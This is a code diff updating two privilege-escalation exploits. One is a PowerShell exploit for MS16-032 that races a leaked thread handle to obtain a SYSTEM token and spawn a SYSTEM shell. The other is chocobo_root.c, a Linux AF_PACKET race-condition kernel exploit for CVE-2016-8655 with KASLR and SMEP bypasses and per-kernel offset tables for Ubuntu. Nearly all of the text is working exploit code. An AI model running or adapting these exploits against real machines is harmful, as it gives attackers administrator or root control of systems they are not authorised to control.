+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName

-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)

-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero

-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			echo "$end"
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}
@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.

@@ -11,7 +11,7 @@ user@ubuntu:~$ uname -a
 Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ id
 uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
 user@ubuntu:~$ ./chocobo_root
 linux AF_PACKET race condition exploit by rebel
 kernel version: 4.4.0-51-generic #72
@@ -75,7 +75,7 @@ Updated by <bcoles@gmail.com>
 - check number of CPU cores
 - KASLR bypasses
 - additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
 */

 #define _GNU_SOURCE
@@ -85,13 +85,13 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <pthread.h>
 #include <sched.h>
 #include <signal.h>
-#include <stdbool.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
-
+#include <linux/if_packet.h>
+#include <netinet/in.h>
 #include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
@@ -102,12 +102,6 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <sys/utsname.h>
 #include <sys/wait.h>

-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
 #define DEBUG

 #ifdef DEBUG
@@ -116,9 +110,18 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #  define dprintf
 #endif

-#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SYSTEM_CHECKS		1
+#define ENABLE_KASLR_BYPASS		1

-// Will be overwritten if ENABLE_KASLR_BYPASS
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
+#  define ENABLE_KASLR_BYPASS_SYSLOG	1
+#  define ENABLE_KASLR_BYPASS_MINCORE	1
+#endif
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;

 // Will be overwritten by detect_versions()
@@ -131,6 +134,7 @@ const char *SYSCTL_PATH = "/proc/sys/hack";
 volatile int barrier = 1;
 volatile int vers_switcher_done = 0;

+// kernel target struct
 struct kernel_info {
    char *kernel_version;
    unsigned long proc_dostring;
@@ -139,6 +143,7 @@ struct kernel_info {
    unsigned long set_memory_rw;
 };

+// Targets
 struct kernel_info kernels[] = {
    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
@@ -170,6 +175,16 @@ struct kernel_info kernels[] = {
    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+
+    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
+    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
+    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
+    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
+    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
+    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
+    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
+    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
+    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
 };

 #define VSYSCALL              0xffffffffff600000
@@ -202,6 +217,7 @@ struct tpacket_req3 tp;
 int sfd;
 int mapped = 0;

+// timer_list struct defined in: include/linux/timer.h
 struct timer_list {
    void *next;
    void *prev;
@@ -255,6 +271,10 @@ void *vers_switcher(void *arg)
 #define BUFSIZE 1408
 char exploitbuf[BUFSIZE];

+#ifndef ETH_P_ARP
+#    define ETH_P_ARP 0x0806
+#endif
+
 void kmalloc(void)
 {
    while(1)
@@ -266,7 +286,7 @@ void pad_kmalloc(void)
    int x;
    for (x = 0; x < KMALLOC_PAD; x++)
        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
+            dprintf("[-] pad_kmalloc() socket error: %m\n");
            exit(EXIT_FAILURE);
        }
 }
@@ -289,7 +309,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(1);
    }

@@ -300,7 +320,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));

    if (fd == -1) {
-        dprintf("[-] target socket error\n");
+        dprintf("[-] target socket error: %m\n");
        exit(1);
    }

@@ -324,7 +344,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sfd = fd;

    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
+        dprintf("[-] Error creating thread: %m\n");
        return 1;
    }

@@ -360,7 +380,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);

    if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
+        dprintf("[-] could not map pbd: %m\n");
        exit(1);
    } else {
        off = pbd->hdr.bh1.offset_to_first_pkt;
@@ -415,13 +435,13 @@ void *modify_vsyscall(void *arg)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(EXIT_FAILURE);
    }

    signal(SIGSEGV, catch_sigsegv);

-    *vsyscall = 0xdeadbeef+x;
+    *vsyscall = 0xdeadbeef + x;

    if (*vsyscall == 0xdeadbeef+x) {
        dprintf("[~] vsyscall page altered!\n");
@@ -449,7 +469,7 @@ void verify_stage1(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -471,7 +491,7 @@ void verify_stage2(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -548,7 +568,29 @@ void wrapper(void)

 // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *

-void check_procs() {
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+    int f = open(file, O_RDONLY);
+    if (f == -1)
+        return -1;
+    int bytes_read = 0;
+    while (1) {
+        int bytes_to_read = CHUNK_SIZE;
+        if (bytes_to_read > max_length - bytes_read)
+            bytes_to_read = max_length - bytes_read;
+        int rv = read(f, &buffer[bytes_read], bytes_to_read);
+        if (rv == -1)
+            return -1;
+        bytes_read += rv;
+        if (rv == 0)
+            return bytes_read;
+    }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+void check_env() {
    int min_procs = 2;

    int nprocs = 0;
@@ -559,7 +601,24 @@ void check_procs() {
        exit(EXIT_FAILURE);
    }

-    dprintf("[.] system has %d processor cores\n", nprocs);
+    char buffer[PROC_CPUINFO_LENGTH];
+    char* path = "/proc/cpuinfo";
+    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+    if (length == -1) {
+        dprintf("[-] open/read(%s): %m\n", path);
+        exit(EXIT_FAILURE);
+    }
+
+    char* found = memmem(&buffer[0], length, "smap", 4);
+    if (found != NULL) {
+        dprintf("[-] SMAP detected, no bypass available\n");
+        exit(EXIT_FAILURE);
+    }
+
+    struct stat st;
+    if (stat("/dev/grsec", &st) == 0) {
+        dprintf("[!] Warning: grsec is in use\n");
+    }
 }

 struct utsname get_kernel_version() {
@@ -573,10 +632,11 @@ struct utsname get_kernel_version() {
 }

 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512

 void detect_versions() {
    struct utsname u;
-    char kernel_version[512];
+    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];

    u = get_kernel_version();

@@ -591,7 +651,7 @@ void detect_versions() {
    }

    char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);

    int i;
    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -607,15 +667,17 @@ void detect_versions() {
 }

 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10

-bool mmap_syslog(char** buffer, int* size) {
+int mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
+        return 0;
    }

    *size = (*size / getpagesize() + 1) * getpagesize();
@@ -625,16 +687,17 @@ bool mmap_syslog(char** buffer, int* size) {
    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
    if (*size == -1) {
        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
+        return 0;
    }

-    return true;
+    return 1;
 }

 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    int start = 0;
    int end = 0;
@@ -642,22 +705,25 @@ unsigned long get_kernel_addr_trusty(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;

-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
    const char* needle1 = "Freeing unused";
    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    int start = 0;
    int end = 0;
@@ -666,17 +732,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

    const char* needle2 = "ffffff";
    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
        return 0;
-    }

    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);

-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;

